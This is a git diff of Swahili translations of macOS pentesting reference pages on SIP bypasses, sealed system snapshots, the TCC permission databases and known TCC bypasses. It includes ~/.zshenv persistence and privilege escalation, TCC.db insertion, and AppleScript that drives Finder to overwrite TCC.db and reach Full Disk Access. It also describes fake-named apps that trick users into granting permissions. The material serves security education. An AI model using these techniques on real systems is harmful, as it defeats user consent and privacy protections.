Zaidi ya hayo, iligundulika kuwa **`/etc/zshenv` inaweza kutumika kama mbinu ya jumla ya shambulio**, sio tu kwa kupita SIP. Kila wasifu wa mtumiaji una faili ya `~/.zshenv`, ambayo inafanya kazi sawa na `/etc/zshenv` lakini haitahitaji ruhusa za mizizi. Faili hii inaweza kutumika kama mbinu ya uthibitisho, ikichochea kila wakati `zsh` inaanza, au kama mbinu ya kuinua ruhusa. Ikiwa mtumiaji wa admin anainua hadi mizizi kwa kutumia `sudo -s` au `sudo <command>`, faili ya `~/.zshenv` itachochewa, ikiongeza kwa ufanisi hadi mizizi.
#### [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/)
Katika [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/) iligundulika kuwa mchakato sawa wa **`system_installd`** bado unaweza kutumiwa vibaya kwa sababu ulikuwa ukitia **post-install script ndani ya folda yenye jina la nasibu iliyolindwa na SIP ndani ya `/tmp`**. Jambo ni kwamba **`/tmp` yenyewe haijalindwa na SIP**, hivyo ilikuwa inawezekana **kuiweka** picha **ya virtual juu yake**, kisha **installer** ingeiweka **post-install script**, **ondoa** picha ya virtual, **unda upya** folda zote na **ongeza** **post installation** script yenye **payload** ya kutekeleza.
Katika [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/) iligundulika kuwa mchakato sawa wa **`system_installd`** bado unaweza kutumiwa vibaya kwa sababu ilikuwa ikiweka **script ya post-install ndani ya folda yenye jina la nasibu iliyo na ulinzi wa SIP ndani ya `/tmp`**. Jambo ni kwamba **`/tmp` yenyewe haina ulinzi wa SIP**, hivyo ilikuwa inawezekana **kuiweka** picha **ya virtual juu yake**, kisha **installer** ingekuwa ikiweka script ya **post-install**, **kuondoa** picha ya virtual, **kuunda upya** folda zote na **kuongeza** script ya **post installation** na **payload** ya kutekeleza.
#### [fsck_cs utility](https://www.theregister.com/2016/03/30/apple_os_x_rootless/)
Udhaifu uligunduliwa ambapo **`fsck_cs`** ilipotoshwa kuharibu faili muhimu, kutokana na uwezo wake wa kufuata **viungo vya ishara**. Kwa hasara, washambuliaji walitengeneza kiungo kutoka _`/dev/diskX`_ hadi faili `/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist`. Kutekeleza **`fsck_cs`** kwenye _`/dev/diskX`_ kulisababisha uharibifu wa `Info.plist`. Uaminifu wa faili hii ni muhimu kwa SIP (Ulinzi wa Uaminifu wa Mfumo) wa mfumo wa uendeshaji, ambayo inasimamia upakiaji wa nyongeza za kernel. Mara tu ikiharibiwa, uwezo wa SIP wa kusimamia exclusion za kernel unaharibiwa.
Udhaifu uligunduliwa ambapo **`fsck_cs`** ilipotoshwa kuharibu faili muhimu, kutokana na uwezo wake wa kufuata **viungo vya alama**. Kwa haswa, washambuliaji walitengeneza kiungo kutoka _`/dev/diskX`_ hadi faili `/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist`. Kutekeleza **`fsck_cs`** kwenye _`/dev/diskX`_ kulisababisha uharibifu wa `Info.plist`. Uadilifu wa faili hii ni muhimu kwa SIP ya mfumo wa uendeshaji, ambayo inasimamia upakiaji wa nyongeza za kernel. Mara baada ya kuharibiwa, uwezo wa SIP wa kusimamia exclusion za kernel unaharibiwa.
Amri za kutumia udhaifu huu ni:
```bash
@ -176,28 +176,28 @@ Kama [**ilivyoelezwa katika chapisho hili la blog**](https://blog.kandji.io/appl
```bash
/usr/bin/chflags -h norestricted "${SHARED_SUPPORT_PATH}/SharedSupport.dmg"
```
na ilikuwa inawezekana kuunda symlink katika `${SHARED_SUPPORT_PATH}/SharedSupport.dmg` ambayo ingemruhusu mtumiaji **kuzuia kikomo chochote, ikipita ulinzi wa SIP**.
na ilikuwa inawezekana kuunda symlink katika `${SHARED_SUPPORT_PATH}/SharedSupport.dmg` ambayo ingemruhusu mtumiaji **kuzuia kikomo chochote, akipita ulinzi wa SIP**.
### **com.apple.rootless.install**
> [!CAUTION]
> Haki **`com.apple.rootless.install`** inaruhusu kupita SIP
Haki `com.apple.rootless.install` inajulikana kupita Ulinzi wa Uadilifu wa Mfumo (SIP) kwenye macOS. Hii ilitajwa kwa kiasi fulani kuhusiana na [**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/).
Haki `com.apple.rootless.install` inajulikana kupita Ulinzi wa Uadilifu wa Mfumo (SIP) kwenye macOS. Hii ilitajwa kwa wazi kuhusiana na [**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/).
Katika kesi hii maalum, huduma ya mfumo wa XPC iliyoko katika `/System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc` ina haki hii. Hii inaruhusu mchakato unaohusiana kupita vikwazo vya SIP. Zaidi ya hayo, huduma hii inatoa njia ambayo inaruhusu kuhamasisha faili bila kutekeleza hatua zozote za usalama.
## Snapshots za Mfumo Zilizotiwa Muhuri
## Snapshots za Mfumo Zilizofungwa
Snapshots za Mfumo Zilizotiwa Muhuri ni kipengele kilichozinduliwa na Apple katika **macOS Big Sur (macOS 11)** kama sehemu ya **Ulinzi wa Uadilifu wa Mfumo (SIP)** ili kutoa safu ya ziada ya usalama na utulivu wa mfumo. Kimsingi ni toleo la mfumo wa volume lisiloweza kubadilishwa.
Snapshots za Mfumo Zilizofungwa ni kipengele kilichotambulishwa na Apple katika **macOS Big Sur (macOS 11)** kama sehemu ya **Ulinzi wa Uadilifu wa Mfumo (SIP)** ili kutoa safu ya ziada ya usalama na utulivu wa mfumo. Kimsingi ni toleo la mfumo wa volume lisiloweza kubadilishwa.
Hapa kuna muonekano wa kina zaidi:
1. **Mfumo Usio Badilika**: Snapshots za Mfumo Zilizotiwa Muhuri zinafanya volume ya mfumo wa macOS "isiyoweza kubadilishwa", ikimaanisha kwamba haiwezi kubadilishwa. Hii inazuia mabadiliko yoyote yasiyoidhinishwa au ya bahati mbaya kwenye mfumo ambayo yanaweza kuathiri usalama au utulivu wa mfumo.
2. **Sasisho za Programu za Mfumo**: Unapofunga sasisho au maboresho ya macOS, macOS huunda snapshot mpya ya mfumo. Volume ya kuanzisha ya macOS kisha inatumia **APFS (Apple File System)** kubadilisha kwenda kwenye snapshot hii mpya. Mchakato mzima wa kutekeleza sasisho unakuwa salama zaidi na wa kuaminika kwani mfumo unaweza kila wakati kurudi kwenye snapshot ya awali ikiwa kitu kikienda vibaya wakati wa sasisho.
3. **Kutenganisha Data**: Kwa kushirikiana na dhana ya Kutenganisha Data na Mfumo iliyozintroduced katika macOS Catalina, kipengele cha Snapshot za Mfumo Zilizotiwa Muhuri kinahakikisha kwamba data na mipangilio yako yote zimehifadhiwa kwenye volume tofauti ya "**Data**". Kutenganisha hii kunafanya data yako kuwa huru kutoka kwa mfumo, ambayo inarahisisha mchakato wa sasisho za mfumo na kuimarisha usalama wa mfumo.
1. **Mfumo Usio Badilika**: Snapshots za Mfumo Zilizofungwa zinafanya volume ya mfumo wa macOS "isiyoweza kubadilishwa", ikimaanisha kwamba haiwezi kubadilishwa. Hii inazuia mabadiliko yoyote yasiyoidhinishwa au ya bahati mbaya kwa mfumo ambayo yanaweza kuathiri usalama au utulivu wa mfumo.
2. **Sasisho za Programu za Mfumo**: Unapoweka sasisho au maboresho ya macOS, macOS huunda snapshot mpya ya mfumo. Volume ya kuanzisha ya macOS kisha inatumia **APFS (Apple File System)** kubadilisha kwenda kwenye snapshot hii mpya. Mchakato mzima wa kutekeleza sasisho unakuwa salama zaidi na wa kuaminika kwani mfumo unaweza kila wakati kurudi kwenye snapshot ya awali ikiwa kitu kikienda vibaya wakati wa sasisho.
3. **Kutenganisha Data**: Kwa kushirikiana na dhana ya Kutenganisha Data na Mfumo iliyotambulishwa katika macOS Catalina, kipengele cha Snapshot ya Mfumo Zilizofungwa kinahakikisha kwamba data na mipangilio yako yote zimehifadhiwa kwenye volume tofauti ya "**Data**". Kutenganisha hii kunafanya data yako kuwa huru kutoka kwa mfumo, ambayo inarahisisha mchakato wa sasisho za mfumo na kuimarisha usalama wa mfumo.
Kumbuka kwamba snapshots hizi zinadhibitiwa kiotomatiki na macOS na hazichukui nafasi ya ziada kwenye diski yako, shukrani kwa uwezo wa kushiriki nafasi wa APFS. Pia ni muhimu kutambua kwamba snapshots hizi ni tofauti na **Time Machine snapshots**, ambazo ni nakala za mfumo mzima zinazoweza kufikiwa na mtumiaji.
Kumbuka kwamba snapshots hizi zinadhibitiwa kiotomatiki na macOS na hazichukui nafasi ya ziada kwenye diski yako, shukrani kwa uwezo wa kushiriki nafasi wa APFS. Pia ni muhimu kutambua kwamba snapshots hizi ni tofauti na **snapshots za Time Machine**, ambazo ni nakala za mfumo mzima zinazoweza kufikiwa na mtumiaji.
### Angalia Snapshots
@ -242,7 +242,7 @@ Amri **`diskutil apfs list`** inaorodhesha **maelezo ya volumes za APFS** na mpa
Katika matokeo ya awali inawezekana kuona kwamba **sehemu zinazoweza kufikiwa na mtumiaji** zimewekwa chini ya `/System/Volumes/Data`.
Zaidi ya hayo, **snapshot ya volume ya mfumo wa macOS** imewekwa katika `/` na ni **iliyotiwa muhuri** (imeandikwa kwa cryptographically na OS). Hivyo, ikiwa SIP itapita na kuibadilisha, **OS haitaanza tena**.
Zaidi ya hayo, **snapshot ya volume ya mfumo wa macOS** imewekwa katika `/` na ni **sealed** (imeandikwa kwa cryptographically na OS). Hivyo, ikiwa SIP itapita na kuibadilisha, **OS haitaanza tena**.
Pia inawezekana **kuhakiki kwamba muhuri umewezeshwa** kwa kukimbia:
```bash

58
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
View File

@ -6,7 +6,7 @@
**TCC (Transparency, Consent, and Control)** ni itifaki ya usalama inayolenga kudhibiti ruhusa za programu. Jukumu lake kuu ni kulinda vipengele nyeti kama **huduma za eneo, mawasiliano, picha, kipaza sauti, kamera, upatikanaji, na ufikiaji wa diski nzima**. Kwa kuhitaji idhini wazi ya mtumiaji kabla ya kutoa ruhusa ya programu kwa vipengele hivi, TCC inaboresha faragha na udhibiti wa mtumiaji juu ya data zao.
Watumiaji hukutana na TCC wakati programu zinapohitaji ufikiaji wa vipengele vilivyolindwa. Hii inaonekana kupitia kipeperushi kinachowaruhusu watumiaji **kuthibitisha au kukataa ufikiaji**. Zaidi ya hayo, TCC inaruhusu vitendo vya moja kwa moja vya mtumiaji, kama **kuvuta na kuacha faili ndani ya programu**, ili kutoa ufikiaji wa faili maalum, kuhakikisha kwamba programu zina ufikiaji tu wa kile kilichoruhusiwa wazi.
Watumiaji wanakutana na TCC wakati programu zinapohitaji ufikiaji wa vipengele vilivyolindwa. Hii inaonekana kupitia kipeperushi kinachowaruhusu watumiaji **kuthibitisha au kukataa ufikiaji**. Zaidi ya hayo, TCC inaruhusu vitendo vya moja kwa moja vya mtumiaji, kama **kuvuta na kuweka faili ndani ya programu**, ili kutoa ufikiaji wa faili maalum, kuhakikisha kwamba programu zina ufikiaji tu wa kile kilichoruhusiwa wazi.
![An example of a TCC prompt](https://rainforest.engineering/images/posts/macos-tcc/tcc-prompt.png?1620047855)
@ -24,28 +24,28 @@ Permissions zinapatikana **kutoka kwa programu ya mzazi** na **permissions** zin
### TCC Databases
Ruhusa/zuio hizo hifadhiwa katika baadhi ya TCC databases:
Ruhusa/zuia kisha zinawekwa katika baadhi ya hifadhidata za TCC:
- Database ya mfumo mzima katika **`/Library/Application Support/com.apple.TCC/TCC.db`**.
- Database hii ina **SIP protected**, hivyo ni lazima kupita SIP ili kuandika ndani yake.
- Database ya mtumiaji TCC **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** kwa mapendeleo ya mtumiaji binafsi.
- Database hii inalindwa hivyo ni lazima michakato yenye haki za juu za TCC kama Full Disk Access iweze kuandika ndani yake (lakini haijalindwa na SIP).
- Hifadhidata ya mfumo mzima katika **`/Library/Application Support/com.apple.TCC/TCC.db`**.
- Hifadhidata hii ina **ulinzi wa SIP**, hivyo ni lazima kupita SIP ili kuandika ndani yake.
- Hifadhidata ya mtumiaji TCC **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** kwa mapendeleo ya mtumiaji binafsi.
- Hifadhidata hii inalindwa hivyo ni lazima michakato yenye ruhusa za juu za TCC kama Upatikanaji wa Disk Kamili inaweza kuandika ndani yake (lakini haijalindwa na SIP).
> [!WARNING]
> Databases za awali pia zina **TCC protected kwa ufikiaji wa kusoma**. Hivyo huwezi **kusoma** database yako ya mtumiaji wa kawaida TCC isipokuwa inatoka kwenye mchakato wenye haki za TCC.
> Hifadhidata za awali pia zina **ulinzi wa TCC kwa upatikanaji wa kusoma**. Hivyo hu **wezi kusoma** hifadhidata yako ya kawaida ya mtumiaji TCC isipokuwa inatoka kwa mchakato wenye ruhusa za TCC.
>
> Hata hivyo, kumbuka kwamba mchakato wenye haki hizi za juu (kama **FDA** au **`kTCCServiceEndpointSecurityClient`**) utaweza kuandika database ya TCC ya watumiaji.
> Hata hivyo, kumbuka kwamba mchakato wenye ruhusa hizi za juu (kama **FDA** au **`kTCCServiceEndpointSecurityClient`**) utaweza kuandika hifadhidata ya TCC ya watumiaji.
- Kuna **database ya tatu** ya TCC katika **`/var/db/locationd/clients.plist`** kuonyesha wateja walio ruhusiwa **kufikia huduma za eneo**.
- Faili iliyo na ulinzi wa SIP **`/Users/carlospolop/Downloads/REG.db`** (pia inalindwa dhidi ya ufikiaji wa kusoma kwa TCC), ina **eneo** la TCC databases zote **halali**.
- Faili iliyo na ulinzi wa SIP **`/Users/carlospolop/Downloads/MDMOverrides.plist`** (pia inalindwa dhidi ya ufikiaji wa kusoma kwa TCC), ina ruhusa zaidi za TCC zilizotolewa.
- Kuna hifadhidata ya **tatu** ya TCC katika **`/var/db/locationd/clients.plist`** kuonyesha wateja walio ruhusiwa **kupata huduma za eneo**.
- Faili iliyo na ulinzi wa SIP **`/Users/carlospolop/Downloads/REG.db`** (pia inalindwa dhidi ya upatikanaji wa kusoma kwa TCC), ina **eneo** la hifadhidata zote za **halali za TCC**.
- Faili iliyo na ulinzi wa SIP **`/Users/carlospolop/Downloads/MDMOverrides.plist`** (pia inalindwa dhidi ya upatikanaji wa kusoma kwa TCC), ina ruhusa zaidi za TCC zilizotolewa.
- Faili iliyo na ulinzi wa SIP **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`** (inaweza kusomwa na mtu yeyote) ni orodha ya ruhusa za programu zinazohitaji ubaguzi wa TCC.
> [!TIP]
> Database ya TCC katika **iOS** iko katika **`/private/var/mobile/Library/TCC/TCC.db`**
> Hifadhidata ya TCC katika **iOS** iko katika **`/private/var/mobile/Library/TCC/TCC.db`**
> [!NOTE]
> **Kituo cha arifa UI** kinaweza kufanya **mabadiliko katika database ya TCC ya mfumo**:
> **Kituo cha arifa UI** kinaweza kufanya **mabadiliko katika hifadhidata ya TCC ya mfumo**:
>
> ```bash
> codesign -dv --entitlements :- /System/Library/PrivateFrameworks/TCC.framework/> Support/tccd
@ -56,7 +56,7 @@ Ruhusa/zuio hizo hifadhiwa katika baadhi ya TCC databases:
>
> Hata hivyo, watumiaji wanaweza **kufuta au kuuliza sheria** kwa kutumia **`tccutil`** zana ya amri.
#### Uliza databases
#### Uliza hifadhidata
{{#tabs}}
{{#tab name="user DB"}}
@ -105,7 +105,7 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
> Kuangalia hifadhidata zote mbili unaweza kuangalia ruhusa ambazo programu imekubali, imekataza, au haina (itauliza).
- **`service`** ni uwakilishi wa mfuatano wa **ruhusa** za TCC
- **`client`** ni **bundle ID** au **path to binary** yenye ruhusa
- **`client`** ni **bundle ID** au **njia ya binary** yenye ruhusa
- **`client_type`** inaonyesha ikiwa ni Kitambulisho cha Bundle(0) au njia kamili(1)
<details>
@ -171,7 +171,7 @@ echo "X'$REQ_HEX'"
```
- Kwa maelezo zaidi kuhusu **sehemu nyingine** za jedwali [**angalia chapisho hili la blog**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive).
Unaweza pia kuangalia **idhini ambazo tayari zimetolewa** kwa programu katika `System Preferences --> Security & Privacy --> Privacy --> Files and Folders`.
Unaweza pia kuangalia **idhini zilizotolewa tayari** kwa programu katika `System Preferences --> Security & Privacy --> Privacy --> Files and Folders`.
> [!TIP]
> Watumiaji _wanaweza_ **kufuta au kuuliza sheria** kwa kutumia **`tccutil`**.
@ -204,7 +204,7 @@ csreq -t -r /tmp/telegram_csreq.bin
### Haki & Ruhusa za TCC
Programu **hazihitaji tu** **kuomba** na **kupewa ruhusa** kwa baadhi ya rasilimali, zinahitaji pia **kuwa na haki zinazofaa**.\
Kwa mfano, **Telegram** ina haki `com.apple.security.device.camera` kuomba **ruhusa ya kutumia kamera**. **Programu** ambayo **haina** haki hii **haitaweza** kupata kamera (na mtumiaji hataulizwa kuhusu ruhusa).
Kwa mfano, **Telegram** ina haki `com.apple.security.device.camera` kuomba **ruhusa ya kutumia kamera**. Programu **ambayo haina** haki hii **haitaweza** kupata kamera (na mtumiaji hataulizwa kuhusu ruhusa).
Hata hivyo, ili programu **zipate** **kufikia** **folda fulani za mtumiaji**, kama vile `~/Desktop`, `~/Downloads` na `~/Documents`, **hazihitaji** kuwa na haki maalum **zozote.** Mfumo utaendesha ufikiaji kwa uwazi na **kuuliza mtumiaji** inapohitajika.
@ -219,10 +219,10 @@ codesign -dv --entitlements :- /System/Applications/Calendar.app
<string>kTCCServiceAddressBook</string>
</array>
```
Hii itakwepa Calendar kumuuliza mtumiaji kuaccess reminders, kalenda na kitabu cha anwani.
Hii itakwepa Calendar kuomba mtumiaji kupata kumbukumbu, kalenda na kitabu cha anwani.
> [!TIP]
> Mbali na baadhi ya nyaraka rasmi kuhusu entitlements, pia inawezekana kupata **habari za kuvutia kuhusu entitlements katika** [**https://newosxbook.com/ent.jl**](https://newosxbook.com/ent.jl)
> Mbali na baadhi ya nyaraka rasmi kuhusu ruhusa, pia inawezekana kupata **habari za kuvutia kuhusu ruhusa katika** [**https://newosxbook.com/ent.jl**](https://newosxbook.com/ent.jl)
Baadhi ya ruhusa za TCC ni: kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... Hakuna orodha ya umma inayofafanua zote lakini unaweza kuangalia hii [**orodha ya zinazojulikana**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive#service).
@ -260,7 +260,7 @@ Sifa ya ziada `com.apple.macl` **haiwezi kufutwa** kama sifa nyingine za ziada k
### Ingiza kwenye TCC
Ikiwa kwa wakati fulani unafanikiwa kupata ufikiaji wa kuandika kwenye hifadhidata ya TCC unaweza kutumia kitu kama ifuatavyo kuongeza kipengee (ondoa maoni):
Ikiwa katika wakati fulani unafanikiwa kupata ufikiaji wa kuandika kwenye hifadhidata ya TCC unaweza kutumia kitu kama ifuatavyo kuongeza kipengee (ondoa maoni):
<details>
@ -325,9 +325,9 @@ macos-apple-events.md
### Automation (Finder) to FDA\*
Jina la TCC la ruhusa ya Automation ni: **`kTCCServiceAppleEvents`**\
Ruhusa hii maalum ya TCC pia inaashiria **programu ambayo inaweza kudhibitiwa** ndani ya hifadhidata ya TCC (hivyo ruhusa haziruhusu kudhibiti kila kitu).
Ruhusa hii maalum ya TCC pia inaashiria **programu ambayo inaweza kudhibitiwa** ndani ya database ya TCC (hivyo ruhusa haziruhusu kudhibiti kila kitu).
**Finder** ni programu ambayo **daima ina FDA** (hata kama haionekani kwenye UI), hivyo ikiwa una **ruhusa za Automation** juu yake, unaweza kutumia ruhusa zake ili **kufanya vitendo vingine**.\
**Finder** ni programu ambayo **daima ina FDA** (hata kama haionekani kwenye UI), hivyo ikiwa una **Automation** ruhusa juu yake, unaweza kutumia ruhusa zake ili **kuifanya ifanye baadhi ya vitendo**.\
Katika kesi hii programu yako itahitaji ruhusa **`kTCCServiceAppleEvents`** juu ya **`com.apple.Finder`**.
{{#tabs}}
@ -361,16 +361,16 @@ EOD
Unaweza kutumia hii **kuandika database yako ya TCC ya mtumiaji**.
> [!WARNING]
> Kwa ruhusa hii utaweza **kuomba finder kufikia folda zilizozuiliwa za TCC** na kukupa faili, lakini kwa maelezo yangu unapaswa **kutoweza kufanya Finder itekeleze msimbo wowote** ili kutumia kikamilifu ufikiaji wake wa FDA.
> Kwa ruhusa hii utaweza **kuomba finder kufikia folda zilizozuiliwa za TCC** na kukupa faili, lakini kadri ninavyojua huwezi **kufanya Finder itekeleze msimbo wowote** ili kutumia kikamilifu ufikiaji wake wa FDA.
>
> Hivyo, huwezi kutumia uwezo wote wa FDA.
> Hivyo basi, huwezi kutumia uwezo wote wa FDA.
Hii ni prompt ya TCC kupata ruhusa za Automation juu ya Finder:
<figure><img src="../../../../images/image (27).png" alt="" width="244"><figcaption></figcaption></figure>
> [!CAUTION]
> Kumbuka kwamba kwa sababu programu ya **Automator** ina ruhusa ya TCC **`kTCCServiceAppleEvents`**, inaweza **kudhibiti programu yoyote**, kama Finder. Hivyo kuwa na ruhusa ya kudhibiti Automator unaweza pia kudhibiti **Finder** kwa msimbo kama ulivyo hapa chini:
> Kumbuka kwamba kwa sababu programu ya **Automator** ina ruhusa ya TCC **`kTCCServiceAppleEvents`**, inaweza **kudhibiti programu yoyote**, kama Finder. Hivyo kuwa na ruhusa ya kudhibiti Automator unaweza pia kudhibiti **Finder** kwa msimbo kama huu hapa chini:
<details>
@ -444,9 +444,9 @@ rm "$HOME/Desktop/file"
```
### Automation (SE) + Accessibility (**`kTCCServicePostEvent`|**`kTCCServiceAccessibility`**)** to FDA\*
Automation kwenye **`System Events`** + Accessibility (**`kTCCServicePostEvent`**) inaruhusu kutuma **mipigo ya funguo kwa michakato**. Kwa njia hii unaweza kutumia Finder kubadilisha TCC.db ya watumiaji au kutoa FDA kwa programu yoyote (ingawa neno la siri linaweza kuombwa kwa hili).
Automation kwenye **`System Events`** + Accessibility (**`kTCCServicePostEvent`**) inaruhusu kutuma **mipigo ya funguo kwa michakato**. Kwa njia hii unaweza kutumia Finder kubadilisha TCC.db ya watumiaji au kutoa FDA kwa programu yoyote (ingawa nenosiri linaweza kuombwa kwa hili).
Mfano wa Finder kuandika upya TCC.db ya watumiaji:
Mfano wa Finder kuandika tena TCC.db ya watumiaji:
```applescript
-- store the TCC.db file to copy in /tmp
osascript <<EOF
@ -506,7 +506,7 @@ Ikiwa una **`kTCCServiceEndpointSecurityClient`**, una FDA. Mwisho.
### TCC DB ya Mtumiaji kwa FDA
Kupata **ruhusa za kuandika** juu ya **database ya mtumiaji TCC** huwezi kujipa **`FDA`** ruhusa, ni yule anayeishi katika database ya mfumo pekee ndiye anaweza kutoa hiyo.
Kupata **ruhusa za kuandika** juu ya **database ya TCC ya mtumiaji** huwezi kujipa **`FDA`** ruhusa, ni yule aliye katika database ya mfumo pekee anayeweza kutoa hiyo.
Lakini unaweza **kujipe** **`Haki za Automation kwa Finder`**, na kutumia mbinu ya awali ili kupandisha hadhi hadi FDA\*.
@ -525,7 +525,7 @@ Database ya **TCC ya mfumo** inalindwa na **SIP**, ndiyo maana ni mchakato pekee
- REG.db
- MDMOverrides.plist
Hata hivyo, kuna chaguo lingine la kutumia **kuepuka SIP ili kuepuka TCC**, faili `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` ni orodha ya ruhusa za programu zinazohitaji msamaha wa TCC. Hivyo, ikiwa mshambuliaji anaweza **kuondoa ulinzi wa SIP** kutoka kwa faili hii na kuongeza **programu yake mwenyewe** programu hiyo itakuwa na uwezo wa kuepuka TCC.\
Hata hivyo, kuna chaguo lingine la kutumia **kuepuka SIP ili kuepuka TCC**, faili `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` ni orodha ya ruhusa za programu zinazohitaji ubaguzi wa TCC. Hivyo, ikiwa mshambuliaji anaweza **kuondoa ulinzi wa SIP** kutoka kwa faili hii na kuongeza **programu yake mwenyewe** programu hiyo itakuwa na uwezo wa kuepuka TCC.\
Kwa mfano kuongeza terminal:
```bash
# Get needed info

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md
View File

@ -4,7 +4,7 @@
## Basic Information
**Apple Events** ni kipengele katika macOS ya Apple kinachowezesha programu kuwasiliana na kila mmoja. Ni sehemu ya **Meneja wa Matukio ya Apple**, ambao ni kipengele cha mfumo wa uendeshaji wa macOS kinachohusika na kushughulikia mawasiliano kati ya michakato. Mfumo huu unaruhusu programu moja kutuma ujumbe kwa programu nyingine kuomba ifanye operesheni fulani, kama kufungua faili, kupata data, au kutekeleza amri.
**Apple Events** ni kipengele katika macOS ya Apple kinachowezesha programu kuwasiliana na kila mmoja. Ni sehemu ya **Apple Event Manager**, ambayo ni kipengele cha mfumo wa uendeshaji wa macOS kinachohusika na ushirikiano wa mchakato. Mfumo huu unaruhusu programu moja kutuma ujumbe kwa programu nyingine kuomba ifanye operesheni fulani, kama kufungua faili, kupata data, au kutekeleza amri.
Daemoni ya mina ni `/System/Library/CoreServices/appleeventsd` ambayo inasajili huduma `com.apple.coreservices.appleevents`.

50
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
View File

@ -16,7 +16,7 @@ ls: Desktop: Operation not permitted
username@hostname ~ % cat Desktop/lalala
asd
```
**sifa ya ziada `com.apple.macl`** inaongezwa kwa **faili** mpya ili kutoa **programu ya waumbaji** ufikiaji wa kuisoma.
**sifa ya kupanuliwa `com.apple.macl`** inaongezwa kwa **faili** mpya ili kutoa **programu ya waumbaji** ufikiaji wa kuisoma.
### TCC ClickJacking
@ -26,8 +26,8 @@ Inawezekana **kweka dirisha juu ya kiashiria cha TCC** ili kumfanya mtumiaji **a
### Ombi la TCC kwa jina la kiholela
Mshambuliaji anaweza **kuunda programu zenye jina lolote** (mfano, Finder, Google Chrome...) katika **`Info.plist`** na kufanya iweze kuomba ufikiaji wa eneo fulani lililohifadhiwa na TCC. Mtumiaji atafikiri kwamba programu halali ndiyo inayohitaji ufikiaji huu.\
Zaidi ya hayo, inawezekana **kuondoa programu halali kutoka kwenye Dock na kuweka ile bandia** juu yake, hivyo wakati mtumiaji anabonyeza ile bandia (ambayo inaweza kutumia ikoni ile ile) inaweza kuita ile halali, kuomba ruhusa za TCC na kutekeleza malware, ikimfanya mtumiaji aamini kwamba programu halali ilihitaji ufikiaji.
Mshambuliaji anaweza **kuunda programu zenye jina lolote** (mfano, Finder, Google Chrome...) katika **`Info.plist`** na kufanya iweze kuomba ufikiaji wa eneo fulani lililohifadhiwa na TCC. Mtumiaji atadhani kwamba programu halali ndiyo inayohitaji ufikiaji huu.\
Zaidi ya hayo, inawezekana **kuondoa programu halali kutoka kwenye Dock na kuweka ile bandia** juu yake, hivyo wakati mtumiaji anabofya ile bandia (ambayo inaweza kutumia ikoni ile ile) inaweza kuita ile halali, kuomba ruhusa za TCC na kutekeleza malware, ikimfanya mtumiaji aamini kwamba programu halali ilihitaji ufikiaji.
<figure><img src="https://lh7-us.googleusercontent.com/Sh-Z9qekS_fgIqnhPVSvBRmGpCXCpyuVuTw0x5DLAIxc2MZsSlzBOP7QFeGo_fjMeCJJBNh82f7RnewW1aWo8r--JEx9Pp29S17zdDmiyGgps1hH9AGR8v240m5jJM8k0hovp7lm8ZOrbzv-RC8NwzbB8w=s2048" alt="" width="375"><figcaption></figcaption></figure>
@ -52,7 +52,7 @@ Hapa unaweza kupata mifano ya jinsi baadhi ya **malwares zimeweza kupita ulinzi
### Handle extensions - CVE-2022-26767
Sifa **`com.apple.macl`** inatolewa kwa faili ili kutoa **programu fulani ruhusa ya kuisoma.** Sifa hii inawekwa wakati wa **drag\&drop** faili juu ya programu, au wakati mtumiaji **anabonyeza mara mbili** faili ili kuifungua na **programu ya kawaida**.
Sifa **`com.apple.macl`** inatolewa kwa faili ili kutoa **programu fulani ruhusa ya kuisoma.** Sifa hii inawekwa wakati wa **drag\&drop** faili juu ya programu, au wakati mtumiaji **anabofya mara mbili** faili ili kuifungua na **programu ya kawaida**.
Hivyo, mtumiaji anaweza **kujiandikisha programu mbaya** kushughulikia nyongeza zote na kuita Huduma za Uzinduzi ili **kuifungua** faili yoyote (hivyo faili mbaya itapata ufikiaji wa kuisoma).
@ -98,7 +98,7 @@ osascript iterm.script
```
#### Juu ya Finder
Au ikiwa programu ina ufikiaji juu ya Finder, inaweza kuwa skripti kama hii:
Au ikiwa App ina ufikiaji juu ya Finder, inaweza kuwa skripti kama hii:
```applescript
set a_user to do shell script "logname"
tell application "Finder"
@ -153,27 +153,27 @@ Maelezo yalikuwa na ufikiaji wa maeneo yaliyo na ulinzi wa TCC lakini wakati not
Binary `/usr/libexec/lsd` pamoja na maktaba `libsecurity_translocate` ilikuwa na haki `com.apple.private.nullfs_allow` ambayo iliruhusu kuunda **nullfs** mount na ilikuwa na haki `com.apple.private.tcc.allow` na **`kTCCServiceSystemPolicyAllFiles`** kufikia kila faili.
Ilikuwa inawezekana kuongeza sifa ya karantini kwa "Library", kuita huduma ya **`com.apple.security.translocation`** XPC na kisha ingeweza kubadilisha Library kuwa **`$TMPDIR/AppTranslocation/d/d/Library`** ambapo nyaraka zote ndani ya Library zinaweza **kufikiwa**.
Ilikuwa inawezekana kuongeza sifa ya karantini kwa "Library", kuita huduma ya **`com.apple.security.translocation`** XPC na kisha itachora Library kwa **`$TMPDIR/AppTranslocation/d/d/Library`** ambapo nyaraka zote ndani ya Library zinaweza **kufikiwa**.
